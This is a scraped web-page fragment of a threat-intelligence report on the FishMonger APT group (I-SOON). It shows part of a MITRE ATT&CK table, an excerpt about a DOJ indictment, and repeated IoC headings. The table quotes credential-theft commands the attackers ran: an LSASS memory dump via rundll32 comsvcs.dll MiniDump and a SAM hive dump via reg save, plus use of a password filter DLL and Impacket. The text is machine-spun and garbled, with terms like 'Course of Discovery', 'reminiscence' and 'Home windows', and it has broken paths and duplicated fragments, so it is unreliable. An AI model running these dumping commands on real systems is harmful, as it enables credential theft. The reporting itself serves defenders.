T1556.002<\/a><\/td>\n Modify Authentication Course of: Password Filter DLL<\/td>\n FishMonger used a customized password filter DLL that may write passwords to disk or exfiltrate them to a distant server.<\/td>\n<\/tr>\n
T1003.001<\/a><\/td>\n OS Credential Dumping: LSASS Reminiscence<\/td>\n FishMonger dumped LSASS reminiscence utilizing rundll32 C:windowssystem32comsvcs.dll, MiniDump<\/span>.<\/td>\n<\/tr>\n
T1003.002<\/a><\/td>\n OS Credential Dumping: Safety Account Supervisor<\/td>\n FishMonger dumped the safety account supervisor utilizing reg save hklmsam C:userspublicmusicsam.hive<\/span>.<\/td>\n<\/tr>\n
Discovery<\/strong><\/td>\n T1087.001<\/a><\/td>\n Account Discovery: Native Account<\/td>\n FishMonger executed internet person<\/span>.<\/td>\n<\/tr>\n
T1016<\/a><\/td>\n System Community Configuration Discovery<\/td>\n FishMonger executed ipconfig \/all<\/span>.<\/td>\n<\/tr>\n
T1007<\/a><\/td>\n System Service Discovery<\/td>\n FishMonger executed tasklist \/svc<\/span>.<\/td>\n<\/tr>\n
T1057<\/a><\/td>\n Course of Discovery<\/td>\n FishMonger executed tasklist \/v<\/span>.<\/td>\n<\/tr>\n
Lateral Motion<\/strong><\/td>\n T1021.002<\/a><\/td>\n Distant Companies: SMB\/Home windows Admin Shares<\/td>\n FishMonger used Impacket to deploy malware on different machines within the native community.<\/td>\n<\/tr>\n
Command and Management<\/strong><\/td>\n T1095<\/a><\/td>\n Non-Software Layer Protocol<\/td>\n ShadowPad communicates over uncooked TCP and UDP.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n
$\"\"$ <\/a><\/p>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"
On March 5th, 2025, the US DOJ unsealed an indictment in opposition to staff of the Chinese language contractor I\u2011SOON for his or her involvement in a number of world espionage operations. These embrace assaults that we beforehand documented and attributed to the FishMonger APT group \u2013 I\u2011SOON\u2019s operational arm \u2013 together with the compromise […]<\/p>\n","protected":false},"author":2,"featured_media":7683,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[58],"tags":[5900,5901,5902,2130,5903,854],"class_list":["post-7681","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","tag-fishmedley","tag-governments","tag-ngos","tag-operation","tag-tanks","tag-targeting"],"_links":{"self":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/7681","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7681"}],"version-history":[{"count":1,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/7681\/revisions"}],"predecessor-version":[{"id":7682,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/7681\/revisions\/7682"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/media\/7683"}],"wp:attachment":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7681"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7681"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7681"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

Technical evaluation<\/h2>\n

Toolset<\/h3>\n

IoCs<\/h2>\nA complete checklist of indicators of compromise (IoCs) and samples might be present in our GitHub repository<\/a>.<\/em><\/p>\n

IoCs<\/h2>\n
A complete checklist of indicators of compromise (IoCs) and samples might be present in our GitHub repository<\/a>.<\/em><\/p>\n